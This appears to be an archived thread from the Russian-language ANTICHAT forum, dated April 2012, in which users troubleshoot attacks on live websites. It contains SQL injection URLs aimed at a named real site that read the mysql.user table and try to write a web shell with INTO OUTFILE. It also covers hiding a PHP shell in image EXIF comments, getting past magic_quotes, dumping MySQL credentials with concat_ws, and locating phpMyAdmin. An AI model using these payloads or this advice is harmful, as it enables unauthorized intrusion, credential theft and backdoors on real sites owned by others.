ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
19.04.2012, 12:14
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
Сообщение от ReV0LVeR
ReV0LVeR said:
spravka.properm.ru/category.php?pid=100+union+select+1,2,3,4,5,6,7,8, 9,10+from+mysql.user
http://spravka.properm.ru/category.php?pid=100+union+select+1,2,3,4,5,6,7,8, 9,10+from+mysql.user+into+outfile+%27/var/www/properm.ru/htdocs/1.txt%27--+
http://spravka.properm.ru/category.php?pid=100+union+select+1,2,3,4,5,6,7,8, 9,10+from+mysql.user+into+outfile+%27tmp/1.txt%27--+
что не так?Помогите докрутить.
ты пути от фонаря нарисовал? там ковычка вызывает ошибку, тоесть фиг ты запишешь чтото в файл, да и права врятли есть
Сообщение от asiaman
asiaman said:
Вопрос следующего плана: заливка шелла через картинку.
Скрипт только переименовывает файлы в порядковый_номер.jpg Изменить расширение не представляется возможным. Далее через exif pilot по очереди в модель камеры, коменты и др. вставлял и подобные вариации. при запросе phpinfo - никакой реакции и ни в одном случае. Хотя коменты, шелл в самом файле - не режуться. просто переименовываются. В случае вызова шелла с расширением jpg - пишет - invalid format bla bla。В случае - картинка + комменты = просто картинка(( запрос: site.ru/3973819_77116-32x32x.jpg?cmd=phpinfo(); - вывод: только картинка.
Залить .htaccess не получиться. Двиг самописный. В админке функций, что кот наплакал.
Прошу подсказать варинты. Или забить?
вариант искать на сайте инклуд, иначе никак
|
|
|
|
19.04.2012, 13:59
|
|
Guest
Сообщений: n/a
Провел на форуме:
13805
Репутация:
0
|
|
Пытаюсь лить шелл,ничего не получается,при таком запросе +union+select+1,2,3,'
a
Файл:
',5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+fr om+mysql.user+into+outfile+'/var/www/html/azaz.html'-- только лишь на странице с которой пытаюсь зальть шелл изменяется титл,но остается ошибка The following errors has been found:
HS+ system error: MYSQL error:1064:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'\',5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,2 1 ' at line 3 (# 256).
The following will be reported to the Administrator:
Error in line 7 of file /var/www/html/PHPscripts/error_inc.php..А файл залить не удается
|
|
|
|
19.04.2012, 14:07
|
|
Guest
Сообщений: n/a
Провел на форуме:
102354
Репутация:
267
|
|
mq=on
|
|
|
|
19.04.2012, 14:21
|
|
Guest
Сообщений: n/a
Провел на форуме:
13805
Репутация:
0
|
|
Сообщение от Ereee
Ereee said:
mq=on
А как их обойти можно?
|
|
|
|
19.04.2012, 15:08
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
Сообщение от Facecontrol
Facecontrol said:
Пытаюсь лить шелл,ничего не получается,при таком запросе +union+select+1,2,3,'
a
Файл:
',5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+fr om+mysql.user+into+outfile+'/var/www/html/azaz.html'-- только лишь на странице с которой пытаюсь зальть шелл изменяется титл,но остается ошибка The following errors has been found:
HS+ system error: MYSQL error:1064:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'\',5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,2 1 ' at line 3 (# 256).
The following will be reported to the Administrator:
Error in line 7 of file /var/www/html/PHPscripts/error_inc.php..А файл залить не удается
Только HTML формы, только хардкод!!11
1. Да, там magic_quotes.
Обойти можно, только если данные из SQL-запроса используються в дальнейших запросах.
Вот сам способ:
/showpost.php?p=663815&postcount=39
2. Ты уверен, что у твоего пользователя есть file_priv? =\
3. HTML - это крута!!1
|
|
|
19.04.2012, 16:35
|
|
Guest
Сообщений: n/a
Провел на форуме:
13805
Репутация:
0
|
|
Сообщение от Tigger
Tigger said:
Только HTML формы, только хардкод!!11
1. Да, там magic_quotes.
Обойти можно, только если данные из SQL-запроса используються в дальнейших запросах.
Вот сам способ:
/showpost.php?p=663815&postcount=39
2. Ты уверен, что у твоего пользователя есть file_priv? =\
3. HTML - это крута!!1
Уверен что у него Y я файлы могу читать
|
|
|
|
19.04.2012, 20:10
|
|
Guest
Сообщений: n/a
Провел на форуме:
13805
Репутация:
0
|
|
Даже те методы обхода не помогают или я не понл как им пользоваться
|
|
|
|
19.04.2012, 21:32
|
|
Guest
Сообщений: n/a
Провел на форуме:
102354
Репутация:
267
|
|
Сообщение от Facecontrol
Facecontrol said:
Даже те методы обхода не помогают или я не понл как им пользоваться
Значит не повезло.
Делай
Код:
Code:
select concat_ws(0x3a,Host,User,Password,File_priv) from mysql.user
Дальше ищи phpmyadmin.
|
|
|
|
19.04.2012, 23:01
|
|
Guest
Сообщений: n/a
Провел на форуме:
13805
Репутация:
0
|
|
Сообщение от Ereee
Ereee said:
Значит не повезло.
Делай
Код:
Code:
select concat_ws(0x3a,Host,User,Password,File_priv) from mysql.user
Дальше ищи phpmyadmin. А как его найти?
|
|
|
|
19.04.2012, 23:07
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
Сообщение от Facecontrol
Facecontrol said:
А как его найти?
ищеш дерикторю
/showpost.php?p=3107725&postcount=2
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
